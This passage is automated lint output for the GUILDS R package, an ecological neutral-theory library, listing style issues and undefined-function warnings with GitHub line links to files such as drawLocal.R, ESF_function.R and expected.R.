~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:110:68:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J - 1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                   ^\n```\n[R/drawLocal.R:112:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:117:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:121:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n           ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:42:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                         ^~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose = TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L39) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  sad <- sort_aux(aux)\n         ^~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L60) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L61) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L88) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L89) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  